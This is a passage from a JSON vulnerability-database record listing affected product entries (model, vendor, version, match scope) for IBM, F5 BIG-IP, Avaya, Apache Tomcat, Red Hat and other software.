        "model": "rational doors web access",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.5.2"
      },
      {
        "model": "rational doors web access",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.5"
      },
      {
        "model": "smartcloud provisioning fix pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.11"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.2.0.0"
      },
      {
        "model": "rational directory server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.1.1.2"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "big-ip apm hf5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "jboss operations network",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "3.2.3"
      },
      {
        "model": "rational lifecycle adapter for hp alm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0"
      },
      {
        "model": "big-ip gtm hf5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.0"
      },
      {
        "model": "big-ip wom",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.0"
      },
      {
        "model": "scale out network attached storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.4.3.2"
      },
      {
        "model": "big-ip link controller hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "iq",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.1"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v35006.4"
      },
      {
        "model": "ip office application server sp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "9.02"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v50007.3"
      },
      {
        "model": "smartcloud provisioning fixpack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.35"
      },
      {
        "model": "aura system platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2.1"
      },
      {
        "model": "aura experience portal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0.2"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "6"
      },
      {
        "model": "aura application server sip core pb3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "53003.0"
      },
      {
        "model": "big-ip wom hf5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "rational test workbench",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1"
      },
      {
        "model": "smartcloud provisioning fix pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.15"
      },
      {
        "model": "rational sap connector",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.0.1"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.7.9.0"
      },
      {
        "model": "aura application server sip core pb26",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "53002.0"
      },
      {
        "model": "linux lts",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "14.04"
      },
      {
        "model": "php",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "php",
        "version": "5.2.17.03"
      },
      {
        "model": "tivoli application dependency discovery manager",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2.0.10"
      },
      {
        "model": "linux lts i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "12.04"
      },
      {
        "model": "proactive contact",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.2.1"
      },
      {
        "model": "websphere message broker",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0"
      },
      {
        "model": "aura system platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "1.1"
      },
      {
        "model": "urbancode release",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.0.1.3"
      },
      {
        "model": "scale out network attached storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.4.2.0"
      },
      {
        "model": "urbancode deploy",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.1.0.1"
      },
      {
        "model": "rational test workbench",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.51"
      },
      {
        "model": "flex system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70006.1"
      },
      {
        "model": "messaging application server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2"
      },
      {
        "model": "big-ip asm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.00"
      },
      {
        "model": "scale out network attached storage",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.4.3.4"
      },
      {
        "model": "big-ip analytics hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "aura presence services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "aura experience portal sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70006.2"
      },
      {
        "model": "big-ip gtm hf7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "big-ip webaccelerator hf5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "urbancode deploy",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.0.1"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.0"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.4"
      },
      {
        "model": "big-ip gtm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "scale out network attached storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.0.0"
      },
      {
        "model": "aura presence services sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.3"
      },
      {
        "model": "aura presence services sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1"
      },
      {
        "model": "openpages grc platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0"
      },
      {
        "model": "big-ip wom",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.3.0"
      },
      {
        "model": "big-ip link controller hf5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "hp-ux b.11.31",
        "scope": null,
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "aura system platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0.2"
      },
      {
        "model": "linux s/390",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "big-ip asm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "communication server 1000m signaling server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "7.0"
      },
      {
        "model": "aura experience portal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "model": "tivoli application dependency discovery manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2.0"
      },
      {
        "model": "rational directory server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.2"
      },
      {
        "model": "communication server 1000e",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "7.0"
      },
      {
        "model": "urbancode deploy",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.0.11"
      },
      {
        "model": "tivoli application dependency discovery manager",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2.2.1"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.0"
      },
      {
        "model": "urbancode deploy",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.0.1.5"
      },
      {
        "model": "big-ip psm hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.0"
      },
      {
        "model": "big-ip wom",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.4"
      },
      {
        "model": "flashsystem 9840-ae1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "840"
      },
      {
        "model": "big-ip pem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.3"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.2"
      },
      {
        "model": "aura application server sip core pb5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "53003.0"
      },
      {
        "model": "big-ip apm hf4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.3.0"
      },
      {
        "model": "openpages grc platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.0.1.5"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v37006.2"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5"
      },
      {
        "model": "rational lifecycle adapter for hp alm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1"
      },
      {
        "model": "tomcat rc10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apache",
        "version": "8.0.0"
      },
      {
        "model": "qradar security information and event manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1"
      },
      {
        "model": "smartcloud provisioning",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.13"
      },
      {
        "model": "big-ip analytics hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "linux arm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "scale out network attached storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.1"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v50006.1"
      },
      {
        "model": "big-ip psm hf7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "urbancode release",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.0.1.4"
      },
      {
        "model": "aura presence services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1.1"
      },
      {
        "model": "big-ip wom",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.0"
      },
      {
        "model": "proactive contact",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.0"
      },
      {
        "model": "ip office application server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "8.1"
      },
      {
        "model": "messaging application server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2.1"
      },
      {
        "model": "big-ip asm hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.0"
      },
      {
        "model": "enterprise linux server optional",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "smartcloud provisioning",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.3"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.3"
      },
      {
        "model": "aura conferencing sp1 standard",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.1.0.0"
      },
      {
        "model": "rational build forge",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.22"
      },
      {
        "model": "qradar security information and event manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2"
      },
      {
        "model": "big-ip webaccelerator hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2"
      },
      {
        "model": "tomcat",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "apache",
        "version": "7.0.53"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1.1"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v50007.1"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.1"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70007.1"
      },
      {
        "model": "tomcat 8.0.0-rc5",
        "scope": null,
        "trust": 0.3,
        "vendor": "apache",
        "version": null
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v37006.4"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2"
      },
      {
        "model": "aura system platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2.1.0.9"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.3"
      },
      {
        "model": "big-ip apm hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "aura application server sip core",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "53003.0"
      },
      {
        "model": "aura application server sip core pb25",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "53002.0"
      },
      {
        "model": "rational directory server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.2.1"
      },
      {
        "model": "tomcat rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apache",
        "version": "8.0.0"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v50006.3"
      },
      {
        "model": "jboss enterprise application platform el5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6.2"
      },
      {
        "model": "aura experience portal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0.1"
      },
      {
        "model": "flashsystem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8400"
      },
      {
        "model": "aura experience portal sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "san volume controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.4"
      },
      {
        "model": "big-ip analytics hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2"
      },
      {
        "model": "arx",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "6.1"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v37007.3"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.2"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.4"
      },
      {
        "model": "communication server 1000e signaling server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "big-ip psm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "model": "security threat response manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "2013.2"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.0.00"
      },
      {
        "model": "aura messaging",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apache",
        "version": "5.5.36.01"
      },
      {
        "model": "big-ip asm hf5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "big-ip ltm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.0"
      },
      {
        "model": "flex system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70007.2"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "flashsystem 9848-ac0",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v840"
      },
      {
        "model": "urbancode deploy",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.0.13"
      },
      {
        "model": "aura system platform sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "big-ip analytics hf5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.1"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v35006.2"
      },
      {
        "model": "rational doors web access",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.51"
      },
      {
        "model": "big-ip wom",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "model": "san volume controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.3"
      },
      {
        "model": "enterprise manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "2.3"
      },
      {
        "model": "scale out network attached storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.4.3.0"
      },
      {
        "model": "smartcloud provisioning",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.12"
      },
      {
        "model": "flex system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70007.3"
      },
      {
        "model": "aura conferencing",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "7.0"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.3.0.5"
      },
      {
        "model": "storwize",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v35007.3.0.5"
      },
      {
        "model": "big-ip psm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.0"
      },
      {
        "model": "aura system platform sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2"
      },
      {
        "model": "flex system",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70007.2.0.8"
      },
      {
        "model": "centos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "centos",
        "version": "6"
      },
      {
        "model": "flashsystem 9846-ac1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v840"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v50006.2"
      },
      {
        "model": "big-ip gtm hf5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "ip office server edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "8.0"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.0"
      },
      {
        "model": "big-ip ltm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "aura utility services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.3"
      },
      {
        "model": "big-ip apm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.0"
      },
      {
        "model": "cognos business intelligence server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2"
      },
      {
        "model": "big-ip wom hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "model": "flex system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70006.3"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "enterprise linux desktop optional",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "communications policy management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "12.1.1"
      },
      {
        "model": "proactive contact",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.3.0"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.0"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apache",
        "version": "7.0"
      },
      {
        "model": "linux",
        "scope": null,
        "trust": 0.3,
        "vendor": "gentoo",
        "version": null
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.4"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.04"
      },
      {
        "model": "big-ip analytics hf7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v35006.3"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "model": "jboss enterprise application platform el6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6.2"
      },
      {
        "model": "aura system platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0.1"
      },
      {
        "model": "tomcat rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apache",
        "version": "8.0.0"
      },
      {
        "model": "big-ip pem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v37006.3"
      },
      {
        "model": "communication server 1000e signaling server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "7.5"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5"
      },
      {
        "model": "aura utility services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "rational directory server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.1.1"
      },
      {
        "model": "rational directory server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.2.0.1"
      },
      {
        "model": "aura application server sip core pb16",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "53002.0"
      },
      {
        "model": "rational automation framework ifix1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.0.1.2"
      },
      {
        "model": "linux ia-32",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.4"
      },
      {
        "model": "storwize",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70007.3.0.5"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.0.00"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.0"
      },
      {
        "model": "big-ip link controller hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2"
      },
      {
        "model": "san volume controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1"
      },
      {
        "model": "cognos business viewpoint fp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1.1"
      },
      {
        "model": "big-ip gtm hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "ip office application server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "9.0"
      },
      {
        "model": "iq",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5"
      },
      {
        "model": "flex system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70006.4"
      },
      {
        "model": "tomcat beta",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apache",
        "version": "7.0"
      },
      {
        "model": "tivoli application dependency discovery manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2.1"
      },
      {
        "model": "big-ip psm hf5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "jboss enterprise application platform el6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "tomcat 8.0.0-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "apache",
        "version": null
      },
      {
        "model": "communication server 1000m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "7.5"
      },
      {
        "model": "communications policy management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "10.4.1"
      },
      {
        "model": "enterprise manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "3.1.1"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "communication server 1000e signaling server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "7.0"
      },
      {
        "model": "enterprise manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "3.1"
      },
      {
        "model": "aura messaging sp4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2"
      },
      {
        "model": "big-ip pem hf4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.3.0"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
